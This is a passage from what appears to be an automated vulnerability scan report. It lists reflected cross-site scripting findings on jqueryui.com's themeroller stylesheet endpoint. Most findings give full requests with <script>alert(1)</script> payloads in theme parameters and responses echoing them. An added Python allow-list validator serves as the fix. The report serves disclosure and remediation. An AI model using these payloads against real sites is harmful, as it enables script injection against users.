The value of the ffDefault request parameter is copied into the response body without any encoding. The payload 8e61c<script>alert(1)</script>c5e6918d0b4 was submitted in the ffDefault parameter and echoed unmodified. The response is served as text/css, and the reflection shown below lands inside the /* ... */ comment at the top of the generated stylesheet, where the script repeats the full query string after "To view and modify this theme, visit". This parameter has a second sink: in the other responses from this endpoint the ffDefault value is also emitted verbatim as the font-family of the .ui-widget rule, so a payload here reaches a CSS property value as well as the comment (the truncated response below does not show that line). A legitimate value is a comma-separated list of font family names, which an allow-list check would have enforced.

Whether the injected <script> tag ever executes depends on a browser ignoring the declared text/css type and rendering the body as HTML; the response sets no X-Content-Type-Options: nosniff header, which is the header that forbids that sniffing. Independently of script execution, unencoded reflection into a stylesheet is a CSS injection sink: if the comment terminator */ is reflected as well (not tested by this scan), an attacker controls rules in a stylesheet that the themeroller page loads, and the font-family sink does not even require closing a comment.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif8e61c<script>alert(1)</script>c5e6918d0b4&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:24 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18126


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif8e61c<script>alert(1)</script>c5e6918d0b4&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorCont
...[SNIP]...
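The fix for every finding in this group is the same: the theme generator must not echo raw query values, whether into the header comment or into CSS rules such as the font-family of .ui-widget. The Python below is an added example of that allow-list validation; it is not the PHP of parseTheme.css.php (whose source is not on this page). The parameter families it enforces (six-digit hex colours, NN_name.png texture names, 0 to 100 opacities, px/em/% units, a font-family list, normal/bold weight, the ctl keyword themeroller, the bare tr flag) are assumptions read off the parameter names and values in the requests above, and the two sample query strings are constructed from the requests in 1.214 and 1.223.

```python
"""Allow-list validation for themeroller-style theme parameters.

Added example, not the PHP behind parseTheme.css.php: each query parameter
is accepted only if it matches the shape a legitimate value has, the header
comment is rebuilt from validated and URL-encoded values, and the .ui-widget
rule is rendered from validated values only.
"""
import re
from urllib.parse import parse_qsl, urlencode

# Value shapes, reconstructed (assumption) from the requests in this section.
HEX_COLOR = re.compile(r"[0-9a-fA-F]{6}")          # bgColor*, borderColor*, fc*, iconColor*
TEXTURE = re.compile(r"\d{2}_[a-z_]+\.png")        # bgTexture*
PERCENT = re.compile(r"100|[1-9]?\d")              # bgImgOpacity*, opacity*
UNIT = re.compile(r"px|em|%")                      # *Unit
LENGTH = re.compile(r"-?\d+(\.\d+)?(px|em|%)?")    # cornerRadius, fsDefault, *Shadow
FONT_LIST = re.compile(r"[A-Za-z0-9 -]+(,\s*[A-Za-z0-9 -]+)*")  # ffDefault
WEIGHT = re.compile(r"normal|bold")                # fwDefault
CTL = re.compile(r"themeroller")                   # ctl (assumed fixed keyword)

LENGTH_PARAMS = {"cornerRadius", "fsDefault", "thicknessShadow",
                 "offsetTopShadow", "offsetLeftShadow", "cornerRadiusShadow"}


def validator_for(name):
    """Pick the validator for a parameter from its name; None means unknown."""
    if name.startswith(("bgColor", "borderColor", "fc", "iconColor")):
        return HEX_COLOR
    if name.startswith("bgTexture"):
        return TEXTURE
    if name.startswith(("bgImgOpacity", "opacity")):
        return PERCENT
    if name.endswith("Unit"):
        return UNIT
    if name in LENGTH_PARAMS:
        return LENGTH
    return {"ffDefault": FONT_LIST, "fwDefault": WEIGHT, "ctl": CTL}.get(name)


def validate_theme(query):
    """Split a query string into accepted values and rejected name/value pairs.

    fullmatch() rather than match() so that a valid prefix followed by a
    payload (cornerRadiusUnit=px<script>...) is still rejected, and so that a
    trailing newline cannot slip past a '$' anchor.
    """
    clean, rejected = {}, {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name == "tr" and value == "":      # bare flag sent by the themeroller UI
            clean["tr"] = ""
            continue
        rule = validator_for(name)
        if rule is None or not rule.fullmatch(value):
            rejected[name] = value
            continue
        clean[name] = value.lower() if rule is HEX_COLOR else value
    return clean, rejected


def render_stylesheet(clean):
    """Emit the header comment and the first rule from validated values only."""
    # urlencode() percent-encodes '*', '<' and '>', so the rebuilt URL can
    # neither close the comment nor carry markup; validation is still needed
    # because the same values also reach CSS property values below.
    url = "http://jqueryui.com/themeroller/?" + urlencode(clean)
    header = ("/*\n* jQuery UI CSS Framework\n"
              "* To view and modify this theme, visit " + url + "\n*/\n\n")
    font = clean.get("ffDefault", "Verdana,Arial,sans-serif")  # default seen in 1.215
    size = clean.get("fsDefault", "1.1")
    if not size.endswith(("px", "em", "%")):
        size += clean.get("fsDefaultUnit", "em")
    return header + ".ui-widget { font-family: %s; font-size: %s; }\n" % (font, size)


# Constructed samples: a trimmed form of the 1.214/1.223 payload requests and
# of a benign theme request from this section.
ATTACK_QUERY = (
    "tr&ffDefault=Helvetica,+Arial,+sans-serif8e61c<script>alert(1)</script>c5e6918d0b4"
    "&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5"
    "&cornerRadiusUnit=pxd3c52<script>alert(1)</script>445d4d1b2e6"
    "&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png"
    "&bgImgOpacityHeader=15&fcHeader=ffffff"
)
BENIGN_QUERY = (
    "ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold"
    "&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=F6A828"
    "&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35"
)

if __name__ == "__main__":
    accepted, dropped = validate_theme(ATTACK_QUERY)
    print("rejected:", sorted(dropped))
    print(render_stylesheet(accepted))
```

Rejected parameters fall back to the stylesheet's defaults rather than being reflected in any form, so a payload in any of the parameters listed in this section produces neither markup nor a stray */ in the output. Adding X-Content-Type-Options: nosniff to the response is a separate, cheap hardening step that removes the MIME-sniffing angle even if another sink is missed.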

1.224. http://jqueryui.com/themeroller/css/parseTheme.css.php [fsDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fsDefault request parameter is copied into the response body without any encoding. The payload c6879<script>alert(1)</script>2e34bfe9b51 was submitted in the fsDefault parameter and echoed unmodified. The response is served as text/css, and the reflection lands inside the /* ... */ comment at the top of the generated stylesheet, where the script repeats the full query string after "To view and modify this theme, visit". A legitimate value for this parameter is a number (with or without a unit, for example 1.1 or 1.1em), so an allow-list check would have rejected the payload outright.

Whether the injected <script> tag ever executes depends on a browser ignoring the declared text/css type and rendering the body as HTML; the response sets no X-Content-Type-Options: nosniff header, which is the header that forbids that sniffing. Independently of script execution, unencoded reflection into a stylesheet is a CSS injection sink: if the comment terminator */ is reflected as well (not tested by this scan), an attacker controls rules in a stylesheet that the themeroller page loads.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1c6879<script>alert(1)</script>2e34bfe9b51&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:14 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1c6879<script>alert(1)</script>2e34bfe9b51&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgC
...[SNIP]...

1.225. http://jqueryui.com/themeroller/css/parseTheme.css.php [fsDefaultUnit parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fsDefaultUnit request parameter is copied into the HTML document as plain text between tags. The payload d7e55<script>alert(1)</script>d46f3bcddf7 was submitted in the fsDefaultUnit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=emd7e55<script>alert(1)</script>d46f3bcddf7&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:14 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=emd7e55<script>alert(1)</script>d46f3bcddf7&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=12121
...[SNIP]...

1.226. http://jqueryui.com/themeroller/css/parseTheme.css.php [fwDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fwDefault request parameter is copied into the HTML document as plain text between tags. The payload 9fe05<script>alert(1)</script>a3223e83584 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal9fe05<script>alert(1)</script>a3223e83584&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:13 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17886


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal9fe05<script>alert(1)</script>a3223e83584&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHea
...[SNIP]...

1.227. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorActive request parameter is copied into the HTML document as plain text between tags. The payload ea390<script>alert(1)</script>666eb3757be was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00ea390<script>alert(1)</script>666eb3757be&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:59 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00ea390<script>alert(1)</script>666eb3757be&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02
...[SNIP]...

1.228. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorContent request parameter is copied into the HTML document as plain text between tags. The payload f1be6<script>alert(1)</script>d3b6bd47496 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbbf1be6<script>alert(1)</script>d3b6bd47496&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:31 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
orHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbbf1be6<script>alert(1)</script>d3b6bd47496&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_s
...[SNIP]...

1.229. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorDefault request parameter is copied into the HTML document as plain text between tags. The payload d091e<script>alert(1)</script>c202334ef47 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666d091e<script>alert(1)</script>c202334ef47&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:35 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
nt=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666d091e<script>alert(1)</script>c202334ef47&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgO
...[SNIP]...

1.230. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorError request parameter is copied into the HTML document as plain text between tags. The payload e0185<script>alert(1)</script>0d9e7bc760c was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0ae0185<script>alert(1)</script>0d9e7bc760c HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:20 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


